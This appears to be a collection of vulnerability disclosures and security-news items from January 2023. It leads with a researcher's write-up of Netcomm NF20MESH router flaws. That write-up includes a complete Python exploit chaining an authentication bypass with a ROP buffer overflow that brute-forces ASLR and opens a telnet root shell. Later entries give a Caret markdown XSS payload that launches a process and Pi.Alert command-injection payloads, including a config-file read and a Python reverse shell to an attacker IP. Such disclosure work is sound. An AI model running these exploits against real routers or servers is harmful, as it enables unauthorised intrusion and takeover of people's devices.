Authentication bypass in Netcomm router models NF20MESH, NF20, and NL1902 allows an unauthenticated user to access content. In order to serve static content, the application performs a check for the existence of specific characters in the URL (.css, .png etc). If it exists, it performs a "fake login" to give the request an active session to load the file and not redirect to the login page.

**Netcomm - Unauthenticated Remote Code Execution**

*   CVE-2022-4873
*   CVE-2022-4874

**Affected Devices:**

Research performed against the NF20MESH router revealed an unauthenticated remote code execution vulnerability that affects devices running firmware prior to version R6B025. The following devices have been confirmed by the vendor to be vulnerable:

*   NF20
*   NF20MESH
*   NL1902

It's possible that other devices may also be affected.

**Overview**

Netcomm produce routers for residential and small business use. At the time of writing, the Netcomm NF20Mesh router is currently recommended by Aussie Broadband when signing up for a new service with the number other Australian service providers and vendors starting to offer Netcomm routers.

Noticing that a new model had been released, I had to know if a previous 0day of mine still worked against it. Aftering promptly ordering the new model, I was quickly saddened to see that two of my bugs didn't work.

Reading through the firmware release notes, it didn't appear that my previous bugs had been found, so I was curious to know why it didn't affect it. As I was stepping through each part of the exploit chain, I noticed that some of the previous functionality I had previously abused to land my original shell had now been retired or removed.

I wanted to try and find another RCE, so I downloaded the latest firmware to try and pull out the filesystem. Unfortunately, all of the newer firmware releases were now provided in an encrypted format.

**Initial Shell**

Not having the luxury of simply running binwalk to pull out the filesystem like I did last time, I started looking for an alternative method to gain access to the device's file system. I spent a fair bit of time trying to black box the web server, looking for ping utilities and other pages that might be shelling out for command injection bugs, arbitrary file reads that could leak file contents etc.

Failing to find any obvious low hanging vulnerabilities, I decided to try and get onto the board by soldering to a UART interface:

Turning the device on, I could see the bootup process happening through the console where eventually I was asked to login. Logging into the device however dropped me into the same telnet shell which I was unable to escape out of:

Restarting the device, I interupted the boot process and added an extra kernel boot parameter:

Continuing the boot process with the r command, I was able to drop into a local shell via serial:

Finally, running the startup commands in /etc/inittab brought all the services up, allowing me to take files off the device with netcat.

**Vulnerabilities**

Having local shell access now allowed me to start looking for vulnerabilities resulting an authentication bypass and a stack-based buffer overflow to achieve unauthenticated remote code execution.

****1\. Authentication Bypasss (CVE-2022-4874):****

While reverse engineering the httpd binary, I noticed the application was performing checks against the request file extensions using the strstr() function.

If you're unfamiliar with the strstr function in C, strstr finds the first occurrence of a word/character within a string. Rather than checking if the file in the path ends with .css, .png etc, it's only checking if the presence of these values in the path are there:

After this check, and additional check is performed to ensuring that a referer is set:

If both these checks pass, the do_ej function then processes the requested file:

Playing around with the strstr() function, I was able to trick the application into thinking I was authenticated by fetching a restricted page that was prefxied with /.css/ in front of it. The strstr check passes, and then processes the request:

I'm not 100% sure as to why the extension check was written this way, but I think this is a work around for serving static content while putting everything behind authentication. In order to serve a background image for the login page, it sets the request as being in an authenticated state to be able to successfully fetch the resource.

Additionally, I noticed there is a strange unauthenticated /twgjtelnetopen.cmd route which, while returning a 404 error page, is opening up the telnet service:

Perhaps some kind of debug/tech support endpoint?

****2\. Buffer Overflow (CVE-2022-4873):****

The second step was trying to find an alternative method for getting code execution on the device.

Using checksec, I could see the httpd binary had been compiled with a non-executable stack (NX), however other exploit mitigations had not been enabled:

    gdb-peda$ checksec
    Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
    Use 'set logging enabled off'.
    
    Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
    Use 'set logging enabled on'.
    
    CANARY    : disabled
    FORTIFY   : disabled
    NX        : ENABLED
    PIE       : disabled
    RELRO     : Partial
    

I looked for cross-references to any system() calls that I might be able to hit, however was unable to find anything that looked injectable. I then looked for any cases of dangerous functions being used that might be exploitable. Fortunately, I was able to find quite a few instances of strcpy being used:

Given the number of strcpy references in the application, I wrote a small python script to starting fuzzing parameters to see if we could trigger any bugs while I performed a deeper analysis of the binary itself. After running the fuzzer, I quickly saw the following crash on my UART console:

    task: cdd0dc00 ti: caca0000 task.ti: caca0000
    PC is at 0x41414140
    LR is at 0x29218
    pc : [<41414140>]    lr : [<00029218>]    psr: 60070010
    sp : bee158c0  ip : 00000000  fp : 41414141
    r10: 41414141  r9 : 41414141  r8 : 00000000
    r7 : 41414141  r6 : 41414141  r5 : 41414141  r4 : 41414141
    r3 : 00000000  r2 : 00000000  r1 : 00000000  r0 : 00000001
    [...]
    

I could also see that I had full control over the r4, r5, r6, r7, r10 and fp registers at the time of the crash. But, most importantly, I had full control over the PC register. Unfortunately with the NX stack protections enabled, I would need to build a ROP chain in order to get a shell.

Looking through the crash I noticed another issue. The memory pages for the binary were being loaded into address ranges containing null bytes:

    Call Process maps
    00010000-0009f000 r-xp 00000000 fe:00 742        /bin/httpd
    000ae000-000af000 r--p 0008e000 fe:00 742        /bin/httpd
    000af000-000b5000 rw-p 0008f000 fe:00 742        /bin/httpd
    [...]
    

This was a problem. Even though the application itself wasn't compiled with ASLR protection, I couldn't use any gadgets in it because the presence of a null byte would terminate the payload early. All the other libraries used by the application were using the system's ASLR, which meant I was going to have to tackle the address randomization of the functions in libraries being used.

To help with getting a working exploit, I turned ASLR off on the router by running the following command:

    echo 0 > /proc/sys/kernel/randomize_va_space
    

This provided a more stable environment to help with debugging the ROP chain by not having addresses changing on me while getting it to work. After getting an exploit working with ASLR turned off, I had to now go back and get it working with it enabled. Fortunately during the debugging process of the current exploit, I noticed that the main application wasn't actually crashing. Instead, it was actually forking out a httpd service which processed the request and was crashing. Additionally, the number of bytes in the address range changing was brute forceable. I grabbed the base address of libc from a crash and calcuated where the addresses to functions would be.

Because the main process wasn't dying, I could keep issuing the same request in an infinite loop and see if I got lucky with libc being loaded again at the hardcoded base address by connecting to the telnet service:

**Exploit / TL;DR:**

If you're really unlucky, it can take up to 10-15 minutes for the exploit to finally get a hit on libc's base address. I've found on average though that somewhere between 3-5 minutes seems to be the sweet spot.

#!/usr/bin/python3
"""
Netcomm NF20MESH Unauthenticated RCE
Author: Brendan Scarvell
Vulnerable versions: <= R6B021
A stack based buffer overflow exists in the sessionKey query string parameter. An authentication bypass
was also discovered by providing /.css/ in the request path. Chaining both of the two bugs together
results in unauthenticated remote code execution.
The exploit can take up to 5-10 minutes until it gets lucky and hits the right base address for libc.
"""

import requests, telnetlib, sys, time

"""
task: cdd0dc00 ti: caca0000 task.ti: caca0000
PC is at 0x444444
LR is at 0x29218
pc : \[<00444444>\]    lr : \[<00029218>\]    psr: 60070010
sp : bee158c0  ip : 00000000  fp : 41414141
r10: 41414141  r9 : 41414141  r8 : 00000000
r7 : 41414141  r6 : 41414141  r5 : 41414141  r4 : 41414141
r3 : 00000000  r2 : 00000000  r1 : 00000000  r0 : 00000001
"""

TARGET \= "192.168.20.1"

MAX\_BUF\_SIZE \= 4140

libc\_system         \= b"%6C%89%a2%b6"   \# 0xb6a2896c

\# Gadgets
big\_pop             \= b"%40%2b%65%b6"   \# 0xb6652b40 (0x00079b40) : mov r0, r1; pop {r4, r5, r6, r7, pc};
add\_r1\_sp\_blx\_r5    \= b"%6c%79%6d%b6"   \# 0xb66d796c (0x000fe96c) : add r1, sp, #0x14; blx r5;
mov\_r0\_r1\_blx\_r3    \= b"%cc%d0%64%b6"   \# 0xb664d0cc (0x000740cc) : mov r0, r1; blx r3;
mov\_r4\_r3\_pop\_r4\_pc \= b"%7c%98%65%b6"   \# 0xb665987c mov r3, r4; mov r0, r3; pop {r4, pc}; 

\# pewpew
buf  \= b"A" \* 4096
buf += big\_pop              \# r3 => pop system() into PC
buf += mov\_r0\_r1\_blx\_r3     \# r5 => mov r1 into r0, blx to r3 to continue chain (big\_pop ^)
buf += b"B" \* ((MAX\_BUF\_SIZE \- len(buf)))                  
buf += mov\_r4\_r3\_pop\_r4\_pc  \# move r4 into r3 to continue rop chain
buf += b"CCCC"              
buf += add\_r1\_sp\_blx\_r5     \# push sp to point at command and save in r1
buf += b"D" \* 16            
buf += libc\_system          \# executed last after r0 populated
buf += b""
buf += b"sh%20-c%20%22/bin/busybox%20telnetd%20-l%20/bin/sh%20-p%2031337%22%23"     

print(f"\[\*\] payload length: {len(buf)}")

buf \= buf.decode("latin1")

\# Referer header is required in the request
headers \= {
    "Referer": f"http://{TARGET}/login.html" 
}

print("\[\*\] bruteforcing aslr. this could take a while..")

pwned \= False

\# keep repeating until the base address for libc is 0xb65d9000, allowing the gadgets + system() line up correctly

while not pwned:
    try:
        r \= requests.get(f"http://{TARGET}/.css/rtroutecfg.cgi?defaultGatewayList=ppp0.3&dfltGw6Ifc=&sessionKey={buf}", timeout\=5, headers\=headers)

    except requests.exceptions.ConnectionError:
        \# successful exploitation hangs connection. Capture timeout so we dont hang forever
        print("\\n\[\*\] got hit on libc @ 0xb65d9000")
    
    try:
        tn \= telnetlib.Telnet(TARGET, 31337)
        if (tn):
            pwned \= True
            print("\[\*\] popping shell")
            time.sleep(2)
            tn.interact()
    except:
        sys.stdout.write(".")
        sys.stdout.flush()

**Timeline**

*   16/10/22 - Requested security contact to report details to.
*   17/10/22 - Netcomm responded advising to send details in ticket to forward to engineering. Advised Netcomm of 60 day disclosure period.
*   01/11/22 - Netcomm provided updated firmware to verify patch. Advised Netcomm patch was incomplete.
*   08/11/22 - Netcomm provided another updated firmware to verify patch. Advised Netcomm issues appeared to be resolved.
*   18/11/22 - Netcomm released firmware (R6B021) with the fix to public. CVE requested through MITRE.
*   03/12/22 - Requested update from MITRE for CVE.
*   16/12/22 - Requested another update from MITRE regarding CVE.
*   27/12/22 - Advisory disclosed. CVE still pending.
*   04/01/23 - CVE-2022-4873 and CVE-2022-4874 assigned to bugs.

CVE-2022-4874: advisories/2022_netcomm_nf20mesh_unauth_rce.md at main · scarvell/advisories

Debian Linux Security Advisory 5313-1 - It was found that those using java.sql.Statement or java.sql.PreparedStatement in hsqldb, a Java SQL database, to process untrusted input may be vulnerable to a remote code execution attack.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5313-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyJanuary 11, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : hsqldbCVE ID         : CVE-2022-41853Debian Bug     : 1023573It was found that those using java.sql.Statement or java.sql.PreparedStatementin hsqldb, a Java SQL database, to process untrusted input may be vulnerable toa remote code execution attack. By default it is allowed to call any staticmethod of any Java class in the classpath resulting in code execution. Theissue can be prevented by updating to 2.5.1-1+deb11u1 or by setting the systemproperty "hsqldb.method_class_names" to classes which are allowed to be called.For example, System.setProperty("hsqldb.method_class_names","abc") or Javaargument -Dhsqldb.method_class_names="abc" can be used. From version2.5.1-1+deb11u1 all classes by default are not accessible except those injava.lang.Math and need to be manually enabled.For the stable distribution (bullseye), this problem has been fixed inversion 2.5.1-1+deb11u1.We recommend that you upgrade your hsqldb packages.For the detailed security status of hsqldb please refer toits security tracker page at:https://security-tracker.debian.org/tracker/hsqldbFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmO98RdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeTvExAAr/PkL7dghDuiVOzcE6Imt2Z1p+qeOIQf/UbvwSZw/fb5zt9QrDmM/fp3d9GhWOoxzspsmNJ6LieCMeN4pih+q1DXaD6HE9o+X90FjYXaJSnfRZMCjbYor6dtN7CnzJnBnr/5iJ6XTS9lSmntpPdLlpXpdicivSeEtLkDgYH3LnZ/YKPVWPnDD6gusce8t3yttfzgZkGL7h6jhS5aWZwD4bbvUVEeb0uzGlYALP3yv4znbwS1483jUPwB0bfUu2mYgR6+byHMoud+aqbqZXkKL4nr+FkwYIRyXkXn5riME+jkM8LegU0kF3A5CkwylkbUdLk4D7glskpuwWbxTjdAmuiqLoHpNbBPyqHd8w4GcOr/ZlcZIXEqownSNv3pGDjqA3KLWzTKmfIAidSLbnKhqQkWpvRlv34kb8jgqDHmYR3wORaHW6jOGGysBqx4igyLLgYGQukk8pHahoR8VF6hiHihkVjjylqnx6m5hAt4CpQCtCzG9IKqTKjSApT8qM8JNvfzgu0Fa3hiY4O3lbr6W5elSnAjeh49tRaRmT/nT6n4sng0MOCPeBsXXRhr8UuwZhh4SU9XAGJ3O6yVRoouAb/IIM6ALwFlMDRwHU+lB3YJhciXj1yMFJqWUKleG3lajnEDXYhlF50W26LKXRE7KAUmkt7H3wQxkgHAKRqPrbc==3k8R-----END PGP SIGNATURE-----

Debian Security Advisory 5313-1

Gentoo Linux Security Advisory 202301-5 - A vulnerability has been discovered in Apache Commons Text which could result in arbitrary code execution. Versions less than 1.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Apache Commons Text: Arbitrary Code Execution  
     Date: January 11, 2023  
     Bugs: #877577  
       ID: 202301-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Apache Commons Text which could  
result in arbitrary code execution.

Background  
==========

Apache Commons Text is a library focused on algorithms working on  
strings.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-java/commons-text      < 1.10.0                    >= 1.10.0

Description  
===========

Apache Commons Text performs variable interpolation, allowing properties  
to be dynamically evaluated and expanded. The standard format for  
interpolation is "${prefix:name}", where "prefix" is used to locate an  
instance of org.apache.commons.text.lookup.StringLookup that performs  
the interpolation. The set of default Lookup instances included  
interpolators that could result in arbitrary code execution or contact  
with remote servers. These lookups are: - "script" - execute expressions  
using the JVM script execution engine (javax.script) - "dns" - resolve  
dns records - "url" - load values from urls, including from remote  
servers Applications using the interpolation defaults in the affected  
versions may be vulnerable to remote code execution or unintentional  
contact with remote servers if untrusted configuration values are used.

Impact  
======

Crafted input to Apache Commons Text could trigger remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache Commons Text users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-java/commons-text-1.10.0"

References  
==========

[ 1 ] CVE-2022-42889  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42889

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-05

Caret is vulnerable to an XSS attack when the user opens a crafted Markdown file when preview mode is enabled. This directly leads to client-side code execution.

CVE-2022-42967 | CVSS 7.5

JFrog Severity:high

Published 10 Jan. 2023 | Last updated 10 Jan. 2023

XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files

Caret Editor

All versions are affected

This issue is caused due to insufficient validation of the document data, which is sent to the Electron renderer. Specifically, in the getMarkdownHtmlElement function in the file app.asar/extensions/Markdown/Markdown.js -

t.firstChild.innerHTML = DOMPurify.sanitize(r)

An older version of DOMPurify is used, which has known filtering bypasses (see below)

Opening a document with the following contents, **when preview mode is enabled**, leads to the immediate execution of an arbitrary process (in this case - Calculator) -

    <form><math><mtext></form><form><mglyph><style></math><img src
    onerror="try{ const {shell} = require('electron');
    shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">
    

Disable Caret's "Preview Mode"

NVD

CVE-2022-42967: Caret XSS RCE |

In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.

SugarCRM SupportPoliciesSecuritysugarcrm-sa-2023-001

**Advisory ID**: https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001

**Revision**: 1.0

**Last Updated**: 2023-01-10

**Status**: Final

**Summary**

**Risk Level**: High

**Vulnerability**: RCE (Remote Code Execution)

**Description**

A Remote Code Execution vulnerability has been identified in the EmailTemplates. Using a specially crafted request, custom PHP code can be injected through the EmailTemplates because of missing input validation. Any user privileges can exploit this vulnerability. 

**Affected Products**

The list of affected products reflects all currently maintained versions at the publication date of this advisory. If you are running older versions than the ones reported below, we strongly advise upgrading immediately to one of the supported versions.

**Product**

**Fixed Release**

SugarCRM 12.2   
Enterprise, Sell, Serve 

12.2.0   
Hotfixed in SugarCloud 

SugarCRM 12.1   
Enterprise, Sell, Serve 

12.1.0   
Hotfixed in SugarCloud 

SugarCRM 12.0   
Enterprise, Sell, Serve 

12.0.   
Hotfix 91155 12.0.0-12.0.1 (Ent+Ult) v1.1   
Hotfix 91155 12.0.0-12.0.1 (Pro) v1.1   
Hotfixed in SugarCloud 

SugarCRM 11.3   
Professional, Enterprise, Ultimate, Sell, Serve 

11.3.0   
Hotfixed in SugarCloud 

SugarCRM 11.2   
Professional, Enterprise, Ultimate, Sell, Serve 

11.2.0   
Hotfixed in SugarCloud 

SugarCRM 11.1   
Professional, Enterprise, Ultimate, Sell, Serve 

11.1.0   
Hotfixed in SugarCloud 

SugarCRM 11.0   
Professional, Enterprise, Ultimate, Sell, Serve 

11.0.4   
Hotfix 91155 11.0.0-11.0.5 (Ent+Ult) v1.1   
Hotfix 91155 11.0.0-11.0.5 (Pro) v1.1   
Hotfixed in SugarCloud 

**Upgrades****On-Site Customers**

For more information on mitigation, please contact Sugar Support or refer to our FAQ. 

**SugarCloud and SugarCRM Managed Hosting Customers**

Hotfix has been applied to all Sugar supported versions. 

**Workaround**

There is no workaround available for this vulnerability.

**Publication History**

2023-01-10

Update audience disclosure

2023-01-03

Internal disclosure

A stand-alone copy of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. SugarCRM reserves the right to change or update this document at any time.

**Credits**

The vulnerability has been responsibly disclosed by several SugarCRM partners and has been fixed by the SugarCRM Security Team.

CVE-2023-22952: sa-2023-001 - SugarCRM Support Site

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.
11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.

11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release updates for its Chromium-based Edge browser.

The vulnerability that's under attack relates to CVE-2023-21674 (CVSS score: 8.8), a privilege escalation flaw in Windows Advanced Local Procedure Call (ALPC) that could be exploited by an attacker to gain SYSTEM permissions.

"This vulnerability could lead to a browser sandbox escape," Microsoft noted in an advisory, crediting Avast researchers Jan Vojtěšek, Milánek, and Przemek Gmerek for reporting the bug.

While details of the vulnerability are still under wraps, a successful exploit requires an attacker to have already obtained an initial infection on the host. It is also likely that the flaw is combined with a bug present in the web browser to break out of the sandbox and gain elevated privileges.

"Once the initial foothold has been made, attackers will look to move across a network or gain additional higher levels of access and these types of privilege escalation vulnerabilities are a key part of that attacker playbook," Kev Breen, director of cyber threat research at Immersive Labs, said.

That having said, the chances that an exploit chain like this is employed in a widespread fashion is limited owing to the auto-update feature used to patch browsers, Satnam Narang, senior staff research engineer at Tenable, said.

It's also worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply patches by January 31, 2023.

What's more, CVE-2023-21674 is the fourth such flaw identified in ALPC – an inter-process communication (IPC) facility provided by the Microsoft Windows kernel – after CVE-2022-41045, CVE-2022-41093, and CVE-2022-41100 (CVSS scores: 7.8), the latter three of which were plugged in November 2022.

Two other privilege escalation vulnerabilities identified as being of high priority affect Microsoft Exchange Server (CVE-2023-21763 and CVE-2023-21764, CVSS scores: 7.8), which stem from an incomplete patch for CVE-2022-41123, according to Qualys.

"An attacker could execute code with SYSTEM-level privileges by exploiting a hard-coded file path," Saeed Abbasi, manager of vulnerability and threat research at Qualys, said in a statement.

Also resolved by Microsoft is a security feature bypass in SharePoint Server (CVE-2023-21743, CVSS score: 5.3) that could permit an unauthenticated attacker to circumvent authentication and make an anonymous connection. The tech giant noted, "customers must also trigger a SharePoint upgrade action included in this update to protect their SharePoint farm."

The January update further remediates a number of privilege escalation flaws, including one in Windows Credential Manager (CVE-2023-21726, CVSS score: 7.8) and three affecting the Print Spooler component (CVE-2023-21678, CVE-2023-21760, and CVE-2023-21765).

The U.S. National Security Agency (NSA) has been credited with reporting CVE-2023-21678. In all, 39 of the vulnerabilities that Microsoft closed out in its latest update enable the elevation of privileges.

Rounding up the list is CVE-2023-21549 (CVSS score: 8.8), a publicly known elevation of privilege vulnerability in the Windows SMB Witness Service, and another instance of security feature bypass impacting BitLocker (CVE-2023-21563, CVSS score: 6.8).

"A successful attacker could bypass the BitLocker Device Encryption feature on the system storage device," Microsoft said. "An attacker with physical access to the target could exploit this vulnerability to gain access to encrypted data."

Furthermore, Redmond has updated its guidance regarding the malicious use of signed drivers (called Bring Your Own Vulnerable Driver) to include an updated block list released as part of Windows security updates on January 10, 2023.

CISA on Tuesday also added CVE-2022-41080, an Exchange Server privilege escalation flaw, to the KEV catalog following reports that the vulnerability is being chained alongside CVE-2022-41082 to achieve remote code execution on vulnerable systems.

The exploit, codenamed OWASSRF by CrowdStrike, has been leveraged by the Play ransomware actors to breach target environments. The defects were fixed by Microsoft in November 2022.

The Patch Tuesday updates also arrive as Windows 7, Windows 8.1, and Windows RT reached end of support on January 10, 2023. Microsoft said it won't be offering an Extended Security Update (ESU) program for Windows 8.1, instead urging users to upgrade to Windows 11.

"Continuing to use Windows 8.1 after January 10, 2023 may increase an organization's exposure to security risks or impact its ability to meet compliance obligations," the company cautions.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Cisco
*   Citrix
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Qualcomm
*   SAP
*   Schneider Electric
*   Siemens
*   Synology
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues January 2023 Patch Tuesday Updates, Warns of Zero-Day Exploit

The jokob-sk/Pi.Alert fork (before 22.12.20) of Pi.Alert allows Remote Code Execution via nmap_scan.php (scan parameter) OS Command Injection.

**Summary**

An OS Command injection vulnerability allows any unauthenticated user to execute arbitrary code on the server.

**Details**

The affected code can be found here:  
https://github.com/jokob-sk/Pi.Alert/blob/main/front/php/server/nmap\_scan.php  
As well as the corresponding leiweibau fork.  
Here is the CWE with more information on how the vulnerability works and can be fixed.  
https://cwe.mitre.org/data/definitions/78.html

Some other helpful links:  
https://cheatsheetseries.owasp.org/cheatsheets/OS\_Command\_Injection\_Defense\_Cheat\_Sheet.html  
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/12-Testing\_for\_Command\_Injection  
https://owasp.org/www-community/attacks/Command\_Injection

**PoC**

Using the default configuration, click on any device and then navigate to the nmap tab. Click on one of the nmap buttons and intercept the request via Burp Proxy. Modify the request by adding a semi-colon and then whatever other command you want to run after the scan=.

scan=192.168.1.5&mode=fast

to

scan=;whoami&mode=fast

it will come back as www-data

another useful command is

scan=;cat ../../../config/pialert.conf&mode=fast  
  

Reverse shell via python (change the ip and port to match attacker machine):

scan=;python -c 'import socket,subprocess;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("192.168.1.63",4444));subprocess.call(\["/bin/sh","-i"\],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'&mode=fast

Video of the POC (unlisted video):  
https://youtu.be/BR43Af5iykE

This same request can result in XSS as well but eh to that because un-authenticated internal only app.

**Impact**

An attacker with access to the pi.alert web UI would be able to run code on server.

CVE-2022-48252: Remote Code Execution via OS Command Injection

Microsoft's January 2023 Patch Tuesday security update contains fixes for bugs in multiple products. Here's what you need to patch now.

Microsoft's first security update for 2023 contained patches for a whopping 98 vulnerabilities, including one that attackers are actively exploiting and another that is publicly known but has not been exploited yet.

Microsoft identified 11 of the vulnerabilities it disclosed today as being of "critical" severity, meaning organizations using affected products need to prioritize these flaws before addressing the other ones. It rated the remaining 87 as "Important," which is a rating the company uses to describe vulnerabilities that, if exploited, could compromise the confidentiality, integrity, or availability of user data but are often not remotely executable or requires some level of user interaction.

**Bugs in Frequently Attacked Products**

Several of the vulnerabilities in the January 2023 security update affect products that are favorite attacker targets. Five of them, for instance, impact Microsoft Exchange Server and three — including one of the most severe flaws in this month's update — are in SharePoint.

"The volume is definitely concerning, especially given the Exchange patches and SharePoint updates," says Dustin Childs, communication manager for Trend Micro's Zero Day Initiative (ZDI) which reported 25 of the bugs that Microsoft closed today. "These are common targets — and targets that often don’t get patched," he notes. "There are also updates submitted by the National Security Agency and Canada’s Communications Security Establishment. That may raise an eyebrow or two."

Multiple security researchers identified a Microsoft SharePoint Server security feature bypass vulnerability CVE-2023-21743 as one that organizations need to jump on right away because of the risk it presents. The bug allows an unauthenticated attacker to bypass authentication and make an anonymous connection to an affected SharePoint server. One complicating factor with the vulnerability for enterprise security teams is that patching alone is not sufficient to mitigate the threat it presents. In addition, they also need to trigger a SharePoint upgrade, which Microsoft has included in this month's security update to protect against exploit activity, Microsoft said.

"This is not a 'patch it and move on' sort of bug," Childs says. "To fully address this vulnerability, admins need to take additional steps as outlined in the update documentation."

**Zero-Day Bug in Windows ALPC**

Another high-priority vulnerability in the January 2023 update is CVE-2023-21674, an actively exploited bug in Windows Advanced Local Procedure Call (ALPC) that allows an attacker to elevate privileges on a compromised system. The zero-day vulnerability impacts all Windows OS versions and could allow an attacker to escape a browser sandbox and gain system level privileges, Microsoft said.

Satnam Narang, senior staff research engineer at Tenable, says that while full details of the bug are not available, it's possible that attackers likely chained the vulnerability with a flaw in a Chromium-based browser or Microsoft Edge to break out of a browser sandbox and gain full system access. 

"Because of the improvements made in browser security, traditional browser exploits by themselves are limited by sandbox technology, restricting an attacker's ability to access the underlying operating system," Narang tells Dark Reading. He says it is likely that an advanced persistent threat group discovered and exploited the vulnerability as part of a targeted attack.

Microsoft described one of the bugs it addressed this month as publicly known but not exploited. The vulnerability, tracked as CVE-2023-21549, exists on the Windows SMB Witness Service and allows an attacker to execute remote procedure call functions normally restricted to privileged accounts only. Microsoft has assigned a score of 8.8 to the vulnerability even though it has assessed the bug as less likely to be exploited.

**A Flood of Privilege-Escalation Flaws**

Two of the 25 bugs that ZDI reported — and which Microsoft patched this month — were Exchange Server elevation-of-privilege vulnerabilities (CVE-2023-21763 and CVE-2023-21764) that resulted from a failed patch for a previous elevation of privilege flaw in Exchange tracked as CVE-2022-41123. "Thanks to the use of a hard-coded path, a local attacker could load their own DLL and execute code at the level of SYSTEM," Childs says.

In total, 39 of the bugs that Microsoft addressed in its latest update enable elevation of privileges, a category of flaw that the company often has rated as being less severe than RCE bugs. This, however, does not mean that organizations can put off addressing them. "Despite their lower score, these vulnerabilities are typically seen in the early stages of an attack and blocking attackers from gaining SYSTEM or domain-level access early in the kill chain can slow down attackers," said Kev Breen, director of cyber-threat research at Immersive Labs in a statement.

Several of the elevation of privilege bugs in the January update affect the Windows Kernel. Among them are CVE-2023-21772, CVE-2023-21750, CVE-2023-21675 and CVE-2023-21773. "The potential risk from these vulnerabilities is high since they affect all devices that run any Windows OS, starting from Windows 7," security vendor Action1 said. Seven of the privilege escalation bugs have low complexity and require low privileges and no user interaction, meaning they are easy to attack, Action1 said.

Other bugs that security researchers identified as being of high priority in Microsoft's January 2023 security update include CVE-2023-21762 and CVE-2023-21745, both of which are spoofing vulnerabilities in Microsoft Exchange Server. "Email servers like Exchange are high-value targets for attackers, as they can allow an attacker to gain sensitive information through reading emails, or to facilitate Business Email Compromise style attacks," Breen said. Organizations need to be aware of the risks that such bugs preset and mitigate them, he added.

Microsoft also updated its previous guidance around the recent use of Microsoft-signed drivers in malicious campaigns by cybercriminals. The guidance now includes a block list that blocks attackers from using the compromised certificate in their environment. For their recommended actions, the company said, "Microsoft recommends that all customers install the latest Windows updates and ensure their anti-virus and endpoint detection products are up to date with the latest signatures and are enabled to prevent these attacks."

98 Patches: Microsoft Greets New Year With Zero-Day Security Fixes

An out-of-bounds read in Organization Specific TLV was found in various versions of OpenvSwitch.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
